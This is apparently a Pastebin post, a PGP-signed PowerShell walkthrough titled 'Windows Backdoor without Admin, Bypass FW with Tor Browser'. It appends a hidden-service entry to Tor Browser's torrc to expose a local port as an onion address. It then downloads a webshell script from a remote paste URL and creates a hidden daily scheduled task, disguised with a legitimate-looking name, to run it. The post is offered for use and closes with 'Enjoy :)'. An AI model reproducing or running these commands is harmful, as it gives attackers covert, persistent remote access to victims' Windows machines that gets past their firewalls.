API tools faq
paste
Advertisement
Vegeta_Ssj

Left Surprise in Tor Browser

Vegeta_Ssj
Jun 29th, 2020 (edited)
342
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PowerShell 2.33 KB | None | 0 0
raw download clone embed print report
  1. -----BEGIN PGP SIGNED MESSAGE-----
  2. Hash: SHA512
  3.  
  4.  _______________________________________
  5. / Vegeta_Ssj : Windows Backdoor without \
  6. \ Admin, Bypass FW with Tor Browser     /
  7.  ---------------------------------------
  8.         \   ^__^
  9.          \  (oo)\_______
  10.             (__)\       )\/\
  11.                 ||----w |
  12.                 ||     ||
  13.  
  14. email: vegeta_ssj@riseup.net
  15. jid: vegeta@exploit.im / vegeta_ssj@4cjw6cwpeaeppfqz.onion
  16.  
  17. https://i.postimg.cc/g2RpjWTZ/webshell.png
  18.  
  19. Find torrc file:
  20.  
  21. PS C:\Users\IEUser> Get-Childitem -recurse -filter torrc
  22. Directory: C:\Users\IEUser\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor
  23.  
  24. Mode                LastWriteTime         Length Name                                                    
  25. - - - - - - - ----                -------------         ------ ----                                                    
  26. - - - - - - - -a----        6/29/2020  12:44 PM           3060 torrc  
  27.  
  28. Left surprise:
  29.  
  30. $torrcpath = "C:\Users\IEUser\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\torrc"
  31. $conf = "HiddenServiceDir C:/Users/IEUser/Desktop/Tor Browser/Browser/TorBrowser/Data/Hidden`nHiddenServicePort 80 127.0.0.1:8080"
  32. $conf | Add-Content -Path $torrcpath
  33.  
  34. $hostname = "C:\Users\IEUser\Desktop\Tor Browser\Browser\TorBrowser\Data\Hidden\hostname"
  35. PS C:\Users\IEUser\> cat $hostname
  36. 4jq55x4lxjhvsbjhqdsjxsevswx34fdt2xjyuduo6tr2www2p3owk8qd.onion
  37.  
  38. Download webshell:
  39.  
  40. $url = "https://pastebin.com/raw/h59LJpni";$output ="$pwd\web-shell.ps1"
  41. Invoke-WebRequest -Uri $url -OutFile $output
  42.  
  43. Create backdoor | sheduled task:
  44.  
  45. PS C:\Users\IEUser\Desktop> schtasks.exe /CREATE /SC DAILY /TN "Legit as Fucked" /TR "powershell -windowstyle hidden C:\Users\IEUser\Desktop\web-shell.ps1" /ST 15:27
  46.  
  47. SUCCESS: The scheduled task "Legit as Fucked" has successfully been created.
  48.  
  49. #start-process PowerShell.exe -arg $pwd\web.ps1 -WindowStyle Hidden
  50.  
  51. Enjoy :)
  52. -----BEGIN PGP SIGNATURE-----
  53.  
  54. iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl8KQMZfFIAAAAAALgAo
  55. aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2
  56. NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK
  57. CJZlLQP+Mplloyhw/leAju7N/VnbSkqBy7DGjKD62tOz8i+4YOYBlg6FTF9gZb6s
  58. TGutGco0OUhEiiYk283t+Fq+duR1i2H+dqCuTuy1ct1C9NB60p3WaUvpFyg/vjOL
  59. FgSvAPlKwkznwSs+3Aoa/Y0HpkOjR3A0/GeveEDGnQ5XNbqxeC4=
  60. =5eai
  61. -----END PGP SIGNATURE-----
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!